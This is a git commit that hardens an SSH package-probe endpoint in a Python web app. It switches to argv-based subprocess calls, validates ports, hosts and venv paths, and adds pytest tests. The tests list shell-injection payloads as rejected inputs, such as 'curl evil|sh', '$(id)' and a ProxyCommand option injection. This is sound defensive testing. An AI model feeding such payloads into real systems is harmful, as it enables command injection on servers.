Harden Cookbook package SSH probe

This commit is contained in:
pewdiepie-archdaemon
2026-06-01 22:44:34 +09:00
parent e5b927597e
commit 743c074b2e
2 changed files with 128 additions and 22 deletions

View File

@@ -4,6 +4,7 @@ import asyncio
import json
import logging
import os
import re
import shlex
import shutil
import subprocess
@@ -57,6 +58,40 @@ def _require_admin(request: Request):
if not auth_manager.is_admin(user):
raise HTTPException(403, "Admin only")
def _reject_cross_site(request: Request):
"""Reject browser cross-site navigations to shell-touching endpoints."""
if request.headers.get("sec-fetch-site") == "cross-site":
raise HTTPException(403, "Cross-site request rejected")
_SSH_PORT_RE = re.compile(r"^\d{1,5}$")
_SAFE_VENV_RE = re.compile(r"^[A-Za-z0-9_./~-]+$")
def _ssh_base_argv(host: str, ssh_port: str | None) -> list[str]:
"""Build an ssh argv prefix for remote probes without local-shell parsing."""
if not host or not str(host).strip() or str(host).lstrip().startswith("-"):
raise ValueError("invalid ssh host")
argv = ["ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no"]
if ssh_port and str(ssh_port).strip() not in ("", "22"):
port = str(ssh_port).strip()
if not _SSH_PORT_RE.match(port) or not (1 <= int(port) <= 65535):
raise ValueError("invalid ssh port")
argv += ["-p", port]
argv.append(str(host).strip())
return argv
def _venv_activate_prefix(venv: str | None) -> str:
"""Return a remote activation prefix while preserving shell expansion of ~."""
if not venv:
return ""
if not _SAFE_VENV_RE.match(venv):
raise ValueError("invalid venv path")
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
return f". {act} && "
logger = logging.getLogger(__name__)
PTY_SUPPORTED = pty is not None and fcntl is not None and hasattr(os, "setsid")
@@ -755,13 +790,12 @@ def setup_shell_routes() -> APIRouter:
never reflected because the check only ever looked at the local host.
"""
_require_admin(request)
_reject_cross_site(request)
import importlib, importlib.metadata as importlib_metadata, shlex, json as _json
port_arg = ""
if ssh_port and str(ssh_port).strip() not in ("", "22"):
_port = str(ssh_port).strip()
if not _port.isdigit():
if not _SSH_PORT_RE.match(_port) or not (1 <= int(_port) <= 65535):
raise HTTPException(400, "Invalid ssh_port")
port_arg = f"-p {int(_port)} "
packages = [
# ── System ── OS binaries, not pip packages
{"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."},
@@ -787,20 +821,13 @@ def setup_shell_routes() -> APIRouter:
if host and remote_names:
try:
py = _package_probe_script(remote_names)
src = ""
if venv:
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
# NOT shlex.quoted: a leading ~ must stay shell-expandable on
# the remote (quoting it breaks `~/venv` → activation fails →
# the && short-circuits and every package reads as missing).
src = f". {act} && "
# `venv` is validated but left unquoted so leading ~ expands on
# the remote; quoting it breaks ~/venv activation.
src = _venv_activate_prefix(venv)
inner = f"{src}python3 -c {shlex.quote(py)}"
ssh_cmd = (
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
f"{shlex.quote(host)} {shlex.quote(inner)}"
)
proc = await asyncio.create_subprocess_shell(
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
argv = _ssh_base_argv(host, ssh_port) + [inner]
proc = await asyncio.create_subprocess_exec(
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
txt = out.decode("utf-8", errors="replace").strip()
@@ -815,6 +842,8 @@ def setup_shell_routes() -> APIRouter:
if isinstance(probe, dict)
}
break
except ValueError as e:
raise HTTPException(400, str(e))
except Exception:
remote_status = {}
if host and remote_system_names:
@@ -824,12 +853,9 @@ def setup_shell_routes() -> APIRouter:
qn = shlex.quote(name)
checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi")
inner = " ; ".join(checks)
ssh_cmd = (
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
f"{shlex.quote(host)} {shlex.quote(inner)}"
)
proc = await asyncio.create_subprocess_shell(
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
argv = _ssh_base_argv(host, ssh_port) + [inner]
proc = await asyncio.create_subprocess_exec(
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
txt = out.decode("utf-8", errors="replace").strip()
@@ -837,6 +863,8 @@ def setup_shell_routes() -> APIRouter:
name, sep, value = line.strip().partition("=")
if sep and name in remote_system_names:
remote_status[name] = value == "1"
except ValueError as e:
raise HTTPException(400, str(e))
except Exception:
pass

View File

@@ -7,12 +7,17 @@ import sys
from pathlib import Path
from types import SimpleNamespace
import pytest
from routes.shell_routes import (
_find_line_break,
_running_in_container,
_docker_row_status,
_package_installed_from_probe,
_package_status_note,
_reject_cross_site,
_ssh_base_argv,
_venv_activate_prefix,
DOCKER_IN_CONTAINER_HINT,
)
@@ -241,3 +246,76 @@ class TestPackageProbeStatus:
assert _package_installed_from_probe("diffusers", missing_torch) is False
assert _package_installed_from_probe("diffusers", ready) is True
class TestSshBaseArgv:
def test_basic_host_no_port(self):
assert _ssh_base_argv("user@example.com", None) == [
"ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no",
"user@example.com",
]
def test_default_port_22_omitted(self):
assert "-p" not in _ssh_base_argv("h", "22")
assert "-p" not in _ssh_base_argv("h", "")
assert "-p" not in _ssh_base_argv("h", None)
def test_custom_port_added_as_separate_argv(self):
assert _ssh_base_argv("h", "2222")[-3:] == ["-p", "2222", "h"]
@pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"])
def test_bad_port_rejected(self, bad):
with pytest.raises(ValueError):
_ssh_base_argv("h", bad)
def test_option_injecting_host_rejected(self):
with pytest.raises(ValueError):
_ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None)
@pytest.mark.parametrize("bad", ["", " ", None])
def test_empty_host_rejected(self, bad):
with pytest.raises(ValueError):
_ssh_base_argv(bad, None)
class TestVenvActivatePrefix:
def test_empty_returns_blank(self):
assert _venv_activate_prefix(None) == ""
assert _venv_activate_prefix("") == ""
def test_appends_bin_activate(self):
assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && "
def test_already_pointing_at_activate(self):
assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && "
@pytest.mark.parametrize("bad", [
"/opt/v && curl evil|sh",
"$(id)",
"`id`",
"v;id",
"v\nid",
"v|id",
])
def test_injection_payloads_rejected(self, bad):
with pytest.raises(ValueError):
_venv_activate_prefix(bad)
class TestRejectCrossSite:
@staticmethod
def _req(headers):
return SimpleNamespace(headers=headers)
def test_cross_site_rejected(self):
from fastapi import HTTPException
with pytest.raises(HTTPException) as exc:
_reject_cross_site(self._req({"sec-fetch-site": "cross-site"}))
assert exc.value.status_code == 403
@pytest.mark.parametrize("site", ["same-origin", "same-site", "none"])
def test_same_origin_and_direct_nav_allowed(self, site):
assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None
def test_missing_header_allowed(self):
assert _reject_cross_site(self._req({})) is None